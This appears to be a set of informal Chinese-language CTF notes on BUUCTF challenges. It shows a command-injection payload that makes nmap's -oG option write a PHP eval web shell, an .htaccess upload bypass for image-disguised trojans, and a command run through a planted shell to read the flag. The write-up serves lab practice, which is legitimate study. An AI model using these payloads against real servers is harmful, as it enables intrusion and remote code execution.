[BUUCTF 2018]Online Tool
细细品读
这是个两个过滤字符出现的漏洞
利用nmap写🐎
namp 可以写木马,那么我们要做的,让nmap执行那个命令。但是
这两个函数。会把我们的命令给放道单引号里,
'\<\?php eval\(\$_POST\[\"a\"\]\)\;\?\> -oG 1.php'最后的语句,就变成了:
nmap -T5 -sT -Pn --host-timeout 2 -F '\<\?php eval\(\$_POST\[\"a\"\]\)\;\?\> -oG 1.php'
我们的命令,被当成了字符串,而不是一条命令,那么我们就要想办法,闭合单引号。
这时候搜索可以发现在nmap命令中 有一个参数-oG可以实现将命令和结果写到文件
'<?php eval($_POST["a"]);?> -oG 1.php '
然后蚁剑连接就行
蓝色的是文件夹名字,然后加上刚刚创建的文件就行了
[GXYCTF2019]BabyUpload
上传上传
上传.htaccess,然后上传呢个没有php的🐎
只能上传jpg的🐎
[RoarCTF 2019]Easy Java
不会java 再议
[强网杯 2019]高明的黑客
下载不动了…
题目大概意思是从一大堆,shell中找给能用的shell
我就不看了
payload:/xk0SzyKwfzw.php?Efa5BVG=cat /flag